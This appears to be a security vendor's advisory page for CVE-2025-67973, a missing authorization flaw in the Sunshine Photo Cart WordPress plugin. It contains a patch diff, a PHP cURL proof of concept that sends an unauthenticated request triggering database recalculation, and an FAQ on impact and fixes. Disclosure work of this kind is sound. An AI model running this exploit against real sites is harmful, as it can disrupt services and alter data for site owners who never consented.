+++ b/sunshine-photo-cart/includes/emails/class-email-order-status.php
@@ -13,12 +13,13 @@

 		$this->add_search_replace(
 			array(
-				'order_id'     => '',
-				'order_number' => '',
-				'order_name'   => '',
-				'first_name'   => '',
-				'last_name'    => '',
-				'status'       => '',
+				'order_id'      => '',
+				'order_number'  => '',
+				'order_name'    => '',
+				'first_name'    => '',
+				'last_name'     => '',
+				'status'        => '',
+				'gallery_names' => '',
 			)
 		);

@@ -41,13 +42,22 @@
 			);
 			$this->add_args( $args );

+			$galleries     = $order->get_galleries();
+			$gallery_names = array();
+			if ( ! empty( $galleries ) ) {
+				foreach ( $galleries as $gallery_id ) {
+					$gallery_names[] = get_the_title( $gallery_id );
+				}
+			}
+
 			$search_replace = array(
-				'order_id'     => $order->get_id(),
-				'order_number' => $order->get_order_number(),
-				'order_name'   => $order->get_name(),
-				'first_name'   => $order->get_customer_first_name(),
-				'last_name'    => $order->get_customer_last_name(),
-				'status'       => $order->get_status_name(),
+				'order_id'      => $order->get_id(),
+				'order_number'  => $order->get_order_number(),
+				'order_name'    => $order->get_name(),
+				'first_name'    => $order->get_customer_first_name(),
+				'last_name'     => $order->get_customer_last_name(),
+				'status'        => $order->get_status_name(),
+				'gallery_names' => join( ', ', $gallery_names ),
 			);
 			$this->add_search_replace( $search_replace );

--- a/sunshine-photo-cart/includes/emails/class-email-summary.php
+++ b/sunshine-photo-cart/includes/emails/class-email-summary.php
@@ -60,7 +60,7 @@
 				'after' => array(
 					'year'  => gmdate( 'Y', $current_after ),
 					'month' => gmdate( 'n', $current_after ),
-					'day'   => dagmdatete( 'j', $current_after ),
+					'day'   => gmdate( 'j', $current_after ),
 				),
 			),
 		);
--- a/sunshine-photo-cart/includes/functions/image.php
+++ b/sunshine-photo-cart/includes/functions/image.php
@@ -29,6 +29,7 @@
 		}
 	}

+	// Searching for images if we have a search term.
 	if ( ! empty( $args['s'] ) ) {

 		$post_parent = ( ! empty( $args['post_parent__in'] ) ) ? "AND {$wpdb->prefix}posts.post_parent IN (" . join( ',', $args['post_parent__in'] ) . ')' : '';
--- a/sunshine-photo-cart/includes/functions/product-options.php
+++ b/sunshine-photo-cart/includes/functions/product-options.php
@@ -25,5 +25,6 @@
 	return array(
 		'select'   => __( 'Select one of many', 'sunshine-photo-cart' ),
 		'checkbox' => __( 'Single checkbox (Yes/No)', 'sunshine-photo-cart' ),
+		'text'     => __( 'Text field', 'sunshine-photo-cart' ),
 	);
 }
--- a/sunshine-photo-cart/includes/payment-methods/paypal-legacy.php
+++ b/sunshine-photo-cart/includes/payment-methods/paypal-legacy.php
@@ -112,7 +112,7 @@
 			$amount_key                   = 'amount_' . $i;
 			$paypal_args[ $name_key ]     = $item->get_name_raw();
 			$paypal_args[ $quantity_key ] = $item->get_qty();
-			$paypal_args[ $amount_key ]   = $item->get_price();
+			$paypal_args[ $amount_key ]   = $item->get_price() - $item->get_discount_per_item();
 			$i++;
 		}
 		if ( $order->get_shipping() > 0 ) {
@@ -311,6 +311,13 @@
 		}
 	}

+	public function create_order_status( $status, $order ) {
+		if ( $order->get_payment_method() == $this->id ) {
+			SPC()->log( 'Setting order status to new for PayPal Legacy payment' );
+			return 'new';
+		}
+		return $status;
+	}

 	function clear_cart() {
 		global $sunshine;
--- a/sunshine-photo-cart/includes/payment-methods/square.php
+++ b/sunshine-photo-cart/includes/payment-methods/square.php
@@ -672,8 +672,6 @@
 			);
 		}

-		sunshine_log( $args, 'Square payment args' );
-
 		$response = $this->api_request( 'v2/payments', $args );

 		if ( is_wp_error( $response ) ) {
--- a/sunshine-photo-cart/sunshine-photo-cart.php
+++ b/sunshine-photo-cart/sunshine-photo-cart.php
@@ -5,7 +5,7 @@
  * Description: Client Gallery Photo Cart & Photo Proofing Plugin for Professional Photographers using WordPress
  * Author: WP Sunshine
  * Author URI: https://www.wpsunshine.com
- * Version: 3.5.6.2
+ * Version: 3.5.7.1
  * Text Domain: sunshine-photo-cart
  * Domain Path: /languages
  * License: GPLv2 or later
@@ -20,7 +20,7 @@
 define( 'SUNSHINE_PHOTO_CART_PATH', plugin_dir_path( __FILE__ ) );
 define( 'SUNSHINE_PHOTO_CART_URL', plugin_dir_url( __FILE__ ) );
 define( 'SUNSHINE_PHOTO_CART_FILE', __FILE__ );
-define( 'SUNSHINE_PHOTO_CART_VERSION', '3.5.6.2' );
+define( 'SUNSHINE_PHOTO_CART_VERSION', '3.5.7.1' );
 define( 'SUNSHINE_PHOTO_CART_STORE_URL', 'https://www.sunshinephotocart.com' );

 if ( ! class_exists( 'Sunshine_Photo_Cart', false ) ) {
--- a/sunshine-photo-cart/templates/email/order-status.php
+++ b/sunshine-photo-cart/templates/email/order-status.php
@@ -28,7 +28,7 @@
 					<?php echo wp_kses_post( $cart_item->get_image_html() ); ?>
 				</td>
 				<td class="order-item--data">
-					<div class="order-item--name"><?php echo esc_html( $cart_item->get_name() ); ?> x <?php echo esc_html( $cart_item->get_qty() ); ?></div>
+					<div class="order-item--name"><?php echo wp_kses_post( $cart_item->get_name() ); ?> x <?php echo esc_html( $cart_item->get_qty() ); ?></div>
 					<div class="order-item--product-options"><?php echo wp_kses_post( $cart_item->get_options_formatted() ); ?></div>
 					<div class="order-item--image-name"><?php echo wp_kses_post( $cart_item->get_image_name() ); ?></div>
 					<div class="order-item--comments"><?php echo wp_kses_post( $cart_item->get_comments() ); ?></div>

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67973 - Sunshine Photo Cart <= 3.5.6.2 - Missing Authorization

<?php

$target_url = "http://vulnerable-wordpress-site.com/wp-admin/index.php";

// The exploit requires only a single GET parameter
$exploit_url = $target_url . "?sunshine_dashboard_clear_stats=1";

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);

// Execute the request to trigger the vulnerability
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check if the request was successful
if ($http_code == 200 || $http_code == 302) {
    echo "[+] Vulnerability triggered successfullyn";
    echo "[+] HTTP Status Code: $http_coden";
    
    // The plugin redirects to admin dashboard after execution
    if (strpos($response, 'wp-admin') !== false) {
        echo "[+] Redirect detected - statistics recalculation likely executedn";
    }
} else {
    echo "[-] Request failed with HTTP code: $http_coden";
}

// Close cURL session
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-67973?
Overview of the vulnerability
CVE-2025-67973 is a medium severity vulnerability found in the Sunshine Photo Cart plugin for WordPress, specifically versions up to and including 3.5.6.2. It is caused by a missing authorization check in the administrative dashboard, allowing unauthenticated attackers to perform unauthorized actions.
How does this vulnerability work?
Mechanism of exploitation
The vulnerability allows attackers to send a GET request to the WordPress admin dashboard with a specific parameter, triggering a resource-intensive database operation without any user authentication. This can lead to denial of service or data manipulation.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Sunshine Photo Cart plugin version 3.5.6.2 or earlier is affected. Administrators should check their plugin version and update if necessary to mitigate the risk.
How can I check if I am affected?
Steps to verify vulnerability
To check if you are affected, navigate to your WordPress admin dashboard, go to the Plugins section, and locate the Sunshine Photo Cart plugin. Verify the version number; if it is 3.5.6.2 or earlier, you are vulnerable.
How can I fix this vulnerability?
Recommended actions for mitigation
The vulnerability is fixed in version 3.5.7.1 of the Sunshine Photo Cart plugin. Update your plugin to this version or later to apply the necessary authorization checks and prevent unauthorized access.
What does the risk level of 'Medium' mean?
Understanding severity ratings
A medium risk level indicates that while the vulnerability is not the most critical, it still poses a significant threat. Exploitation can lead to unauthorized actions that may affect site performance or data integrity, necessitating prompt attention.
What is the CVSS score for this vulnerability?
Context of CVSS scoring
CVE-2025-67973 has a CVSS score of 5.3, which reflects its medium severity. The score is determined based on factors such as exploitability, impact, and the complexity of the attack.
What is a proof of concept (PoC)?
Demonstrating the vulnerability
A proof of concept is a demonstration that illustrates how the vulnerability can be exploited. The PoC for CVE-2025-67973 shows how an attacker can send a simple GET request to trigger the unauthorized action, highlighting the ease of exploitation.
How does the PoC exploit the vulnerability?
Technical details of exploitation
The PoC uses a cURL request to send a GET parameter to the vulnerable endpoint. This request triggers the recalculation function without any authentication, showcasing how an attacker can exploit the missing authorization check.
What are the potential consequences of exploitation?
Impact of successful attacks
Successful exploitation can lead to server resource exhaustion, potentially causing denial of service. Additionally, it may allow unauthorized data manipulation through forced database recalculations, affecting order statistics and site functionality.
What best practices can help prevent similar vulnerabilities?
Security measures for WordPress sites
To prevent similar vulnerabilities, regularly update all plugins and themes, implement proper access controls, and conduct security audits. Additionally, consider using security plugins that monitor for unauthorized changes and vulnerabilities.
Where can I find more information about CVE-2025-67973?
Resources for further reading
Detailed information about CVE-2025-67973 can be found on the National Vulnerability Database (NVD) and security advisories from WordPress security resources. Regularly check these sources for updates on vulnerabilities and patches.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations